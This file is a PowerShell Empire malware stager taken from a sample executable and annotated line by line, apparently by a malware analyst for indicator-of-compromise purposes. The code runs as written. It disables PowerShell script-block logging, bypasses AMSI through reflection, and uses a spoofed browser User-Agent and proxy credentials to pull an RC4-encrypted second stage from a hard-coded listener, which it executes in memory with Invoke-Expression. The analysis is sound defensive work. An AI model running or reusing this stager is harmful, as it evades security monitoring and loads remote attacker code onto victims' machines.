
LabTestHttp.ps1

# PowerShell script (PowerShell Empire stager) extracted from LabTestHttp.exe (8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60)
# https://www.virustotal.com/#/file/8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60/details
#
# NOTE: this is a live stager. Run it and it disables script-block logging and AMSI in the
# current process, fetches stage 2 from the hard-coded listener, and executes it in memory
# via IEX. The listing is kept byte-for-byte for IOC purposes; analyse it in an isolated lab only.

# Stage 0: in-process defence evasion. Only attempted on PowerShell 3+ — presumably because the
# private fields patched below do not exist on 2.0 (TODO confirm against the 2.0 engine).
# The random capitalisation, split string literals ('ScriptB' + 'lockLogging', 'N' + 'onPublic,Static')
# and the backtick in "GETFie`LD" are signature-evasion obfuscation; they do not change semantics.
If ($PSVeRSionTable.PSVersIoN.MAjor -gE 3)
{
    # Reflect into the engine assembly ([REF].Assembly) and grab the private static field
    # Utils.cachedGroupPolicySettings — the in-memory cache the engine consults for policy values.
    $GPF = [REF].ASSemblY.GEtTyPE('System.Management.Automation.Utils')."GETFie`LD"('cachedGroupPolicySettings', 'N' + 'onPublic,Static');
    IF ($GPF)
    {
        # $GPC is the cached settings dictionary itself (static field, so instance is $null).
        $GPC = $GPF.GEtVAluE($NulL);
        # If a ScriptBlockLogging entry is already cached, zero both switches in place.
        If ($GPC['ScriptB' + 'lockLogging'])
        {
            $GPC['ScriptB' + 'lockLogging']['EnableScriptB' + 'lockLogging'] = 0;
            $GPC['ScriptB' + 'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
        }
        # Also plant a fresh "disabled" entry under the full HKLM policy key path, so a later
        # lookup keyed by registry path also resolves to logging-off for this process.
        # Note this never touches the registry: the real GPO stays intact, only this process lies to itself.
        $val = [COLlecTionS.GeNERic.DIctIoNARY[STrIng, SYStEm.ObJeCt]]::NEw();
        $VAl.ADD('EnableScriptB' + 'lockLogging', 0);
        $VAl.AdD('EnableScriptBlockInvocationLogging', 0);
        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB' + 'lockLogging'] = $VAL
    }
    ElSE
    {
        # Fallback when cachedGroupPolicySettings is absent (presumably newer engine builds):
        # replace the private static ScriptBlock.signatures set with an empty HashSet.
        # NOTE(review): this looks like the "suspicious content" pattern list that forces
        # automatic script-block logging; with it emptied nothing matches — confirm against the engine source.
        [SCRiPtBLOCk]."GEtFie`ld"('signatures', 'N' + 'onPublic,Static').SeTVAlue($NuLl, (NEW-ObJECt CoLLEcTIoNs.GENERIc.HASHSeT[STriNG]))
    }
    # AMSI bypass: set AmsiUtils.amsiInitFailed = $true so the engine treats AMSI as
    # uninitialised and skips scanning the content executed later. The `?{ $_ }` filter makes
    # this a no-op when the AmsiUtils type does not exist (engine without AMSI support).
    # Detection note: the literals 'cachedGroupPolicySettings', 'amsiInitFailed' and
    # GetField('signatures') are well-known indicators of this bypass family.
    [Ref].ASSeMblY.GeTTYPe('System.Management.Automation.AmsiUtils') | ?{ $_ } | %{ $_.GetFieLd('amsiInitFailed', 'NonPublic,Static').SETVaLuE($nuLl, $TRue) };
};
# Stage 1: fetch and run the encrypted second stage.
# Do not send "Expect: 100-continue" on requests (keeps the HTTP exchange to a single round trip).
[SYSteM.NEt.SerVicEPoinTMaNAger]::EXPECT100CoNTiNUe = 0;
$wc = New-ObjeCt SYSTem.Net.WEbClIEnT;
# Hard-coded IE11-on-Windows-7 User-Agent so the beacon blends in with browser traffic.
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$Wc.HeAdErs.ADd('User-Agent', $u);
# Use the system proxy with the logged-on user's credentials, so the download also works
# through an authenticating corporate proxy.
$Wc.PRoxY = [SYstem.NeT.WEBReQueSt]::DeFaultWEbProXY;
$WC.ProxY.CReDeNtiAlS = [SYSTEm.Net.CrEDenTIAlCacHE]::DefAuLtNeTWorKCredENTIALS;
# Saved at script scope; presumably reused by the stage-2 agent (not visible here).
$Script:Proxy = $wc.Proxy;
# Staging key as ASCII bytes (32 chars). Treat this string as an IOC for this listener.
$K = [SYSTem.TeXT.ENCODInG]::ASCII.GEtByTEs('x,ZTvr?M[W%8dw7)aIP>*<Opy6hH0Qg|');
# $R is a plain RC4 implementation: args are ($D = ciphertext bytes, $K = key bytes).
# First statement is the key-scheduling step (j = (j + S[i] + K[i mod keylen]) mod 256, swap);
# second is the PRGA XORed over each input byte. $J/$I/$H start unset, which PowerShell
# arithmetic treats as 0, and they persist across the ForEach-Object iterations.
$R = {
    $D, $K = $ARGs; $S = 0 .. 255; 0 .. 255 | %{ $J = ($J + $S[$_] + $K[$_ % $K.CouNT]) % 256; $S[$_], $S[$J] = $S[$J], $S[$_] };
    $D | %{ $I = ($I + 1) % 256; $H = ($H + $S[$I]) % 256; $S[$I], $S[$H] = $S[$H], $S[$I]; $_ -BXoR $S[($S[$I] + $S[$H]) % 256] }
};
# Listener (RFC 1918 address — a lab host) and staging URI. The User-Agent / Cookie / URI
# combination is consistent with Empire's default http listener profile (hedge: verify against the profile in use).
$ser = 'http://192.168.50.68:8080';
$t = '/login/process.php';
# The session cookie value is presumably the Empire routing packet that identifies this
# stager to the listener; together with the IP, URI and staging key it is the network IOC set.
$wc.HeAders.Add("Cookie", "session=U1IMmdBupBXJMDz0Ondvr8vK0Ac=");
$dAtA = $WC.DOwNLoAdDATa($SEr + $T);
# Response layout: 4-byte IV, then RC4 ciphertext. Decryption key is IV || staging key.
$iV = $DatA[0 .. 3];
# Upper slice bound is one past the last index; this appears to rely on PowerShell tolerating
# an out-of-range slice bound. Decrypted bytes are cast to chars, joined, and executed in
# memory via Invoke-Expression — nothing is written to disk.
$data = $DATa[4 .. $dATA.LENgTH]; -jOIn [Char[]](& $R $DATA ($IV + $K)) | IEX
exit